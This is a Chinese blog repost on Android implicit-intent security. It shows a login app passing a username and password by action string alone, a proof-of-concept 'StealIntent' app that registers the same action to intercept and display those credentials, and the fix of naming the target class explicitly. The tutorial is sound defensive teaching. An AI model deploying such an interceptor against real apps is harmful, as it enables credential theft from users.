android安全-intent
来源:互联网 发布:中文学位论文数据库 编辑:程序博客网 时间:2024/06/02 01:44
原文: http://www.sectop.com/?p=187
一、intent简介
android环境中,intent主要用于信息传递,intent如果使用隐式方式(setaction)来标识intent消息,接收方通过此action来接收信息。
如果intent没有明确指定哪些接收方有权限接收,则恶意程序指定action标识后,获取intent内容,将导致数据泄露。
二、实例
intent可以分别用startactivity,startservice,sendbroadcast方法,给activity,service和broadcat传递信息。
下面例子使用activity,
应用SendIntent是正常应用,有两个activity,LoginActivity用于登录界面,MainActiviey用于显示登录后的界面和提交的intent信息;
SendIntent androidmanifest.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?
xml
version
=
"1.0"
encoding
=
"utf-8"
?>
<
manifest
xmlns:android
=
"http://schemas.android.com/apk/res/android"
package
=
"com.xiaod.SendIntent"
android:versionCode
=
"1"
android:versionName
=
"1.0"
>
<
uses-sdk
android:minSdkVersion
=
"8"
/>
<
application
android:icon
=
"@drawable/icon"
android:label
=
"@string/app_name"
>
<
activity
android:name
=
".LoginActivity"
android:label
=
"@string/app_name"
>
<
intent-filter
>
<
action
android:name
=
"android.intent.action.MAIN"
/>
<
category
android:name
=
"android.intent.category.LAUNCHER"
/>
</
intent-filter
>
</
activity
>
<
activity
android:name
=
".MainActivity"
android:label
=
"Main"
>
<
intent-filter
>
<
action
android:name
=
"com.xiaod.SendIntent.action.main"
/>
<
category
android:name
=
"android.intent.category.DEFAULT"
/>
</
intent-filter
>
</
activity
>
</
application
>
</
manifest
>
LoginActivity.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
package
com.xiaod.SendIntent;
import
android.app.Activity;
import
android.content.Intent;
import
android.os.Bundle;
import
android.view.View;
import
android.view.View.OnClickListener;
import
android.widget.Button;
import
android.widget.EditText;
public
class
LoginActivity
extends
Activity {
private
EditText et_user;
private
EditText et_pwd;
private
Button btn_login;
/** Called when the activity is first created. */
@Override
public
void
onCreate(Bundle savedInstanceState) {
super
.onCreate(savedInstanceState);
setContentView(R.layout.login);
et_user = (EditText) findViewById(R.id.et_user);
et_pwd = (EditText) findViewById(R.id.et_pwd);
btn_login = (Button) findViewById(R.id.btn_login);
btn_login.setOnClickListener(
new
OnClickListener(){
@Override
public
void
onClick(View v) {
// TODO Auto-generated method stub
Intent m_intent =
new
Intent();
m_intent.putExtra(
"username"
, et_user.getText().toString());
m_intent.putExtra(
"password"
, et_pwd.getText().toString());
m_intent.setAction(
"com.xiaod.SendIntent.action.main"
);
m_intent.addCategory(Intent.CATEGORY_DEFAULT);
startActivity(m_intent);
}
});
}
}
应用StealIntent是恶意应用,用于窃听SendIntent应用中LoginActivity界面发送给MainActiviey界面的intent。
StealIntent androidmanifest.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?
xml
version
=
"1.0"
encoding
=
"utf-8"
?>
<
manifest
xmlns:android
=
"http://schemas.android.com/apk/res/android"
package
=
"com.xiaod.StealIntent"
android:versionCode
=
"1"
android:versionName
=
"1.0"
>
<
uses-sdk
android:minSdkVersion
=
"8"
/>
<
application
android:icon
=
"@drawable/icon"
android:label
=
"@string/app_name"
>
<
activity
android:name
=
".StealIntentActivity"
android:label
=
"@string/app_name"
>
<
intent-filter
>
<
action
android:name
=
"com.xiaod.SendIntent.action.main"
/>
<
category
android:name
=
"android.intent.category.DEFAULT"
/>
</
intent-filter
>
</
activity
>
</
application
>
</
manifest
>
StealIntentActivity.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package
com.xiaod.StealIntent;
import
android.app.Activity;
import
android.os.Bundle;
import
android.widget.Toast;
public
class
StealIntentActivity
extends
Activity {
/** Called when the activity is first created. */
@Override
public
void
onCreate(Bundle savedInstanceState) {
super
.onCreate(savedInstanceState);
setContentView(R.layout.main);
Toast.makeText(getBaseContext(),
"username: "
+
this
.getIntent().getStringExtra(
"username"
)+
"\npassword: "
+
this
.getIntent().getStringExtra(
"password"
),
Toast.LENGTH_SHORT).show();
}
}
在SendIntent点击登录后,StealIntent也会接收到intent发送的信息
三、解决方法
不要使用action标识intent,显式地指定intent发送到的包和处理类
1
2
3
4
5
Intent m_intent =
new
Intent();
m_intent.putExtra(
"username"
, et_user.getText().toString());
m_intent.putExtra(
"password"
, et_pwd.getText().toString());
m_intent.setClassName(
"com.xiaod.SendIntent"
,
"com.xiaod.SendIntent.MainActivity"
);
startActivity(m_intent);
- android安全-intent
- Android中的Intent意图安全
- Android中的Intent Filter与安全
- Android安全之Intent Scheme Url攻击
- 深入浅出Android安全(1)- Intent Spoofing
- android应用安全——组件通信安全(Intent)
- android应用安全——组件通信安全(Intent)
- Android静态安全检测 -> Intent Scheme URL 漏洞
- Android静态安全检测 -> Intent隐式调用
- Android intent intent-filter
- Android intent intent-filter
- Android intent intent-filter
- Android intent
- Android Intent
- Android Intent
- android Intent
- android intent
- android intent
- POJ 1743 - Musical Theme 后缀数组模板+用后缀数组求不覆盖最长重复子序列
- ASP.NET中JSON的序列化和反序列化
- C语言链栈以及回溯算法解决迷宫问题
- javascript编程: JSON, Mapping, 回调
- hdu2079选课时间(题目已修改,注意读题)
- android安全-intent
- iBatis分页
- oracle 11g RAC public/virtual/SACN/private IP we need to know
- splunk设置realtime search的配置
- 动态规划_钢条切割问题
- ADO数据库编程
- Java HTTP请求类封装
- 淘宝nigix技术书
- cppPrimer6